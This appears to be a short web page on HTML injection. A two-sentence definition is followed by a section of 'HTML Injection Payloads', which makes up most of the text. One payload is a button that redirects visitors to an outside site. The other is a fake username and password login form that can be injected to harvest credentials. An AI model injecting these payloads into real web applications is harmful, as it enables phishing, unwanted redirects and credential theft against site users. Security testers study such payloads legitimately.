HTML Injection:-
Hypertext Markup Language (HTML) injection is a technique used to take advantage of non-validated input to modify a web page presented by a web application to its users. … When applications fail to validate user data, an attacker can send HTML-formatted text to modify site content that gets presented to other users.HTML Injection Vulnerability | Part – 1
HTML Injection Vulnerability | Part – 2
HTML Injection Payloads
<html>
<head>
<title>A freaking Button</title>
</head>
<body>
<button onclick="window.location.href='https://rvrss.in';">
Click Me!
</button>
</body>
</html>
<!DOCTYPE html>
<html>
<head>
<title>Page Title</title>
</head>
<body>
<form action="/action_page.php">
<label for="Password">Username :</label>
<input type="text" id="fname" name="fname"><br><br>
<label for="Password">Password :</label>
<input type="password" id="lname" name="lname"><br><br>
<input type="submit" value="Submit">
</form>
</body>
</html>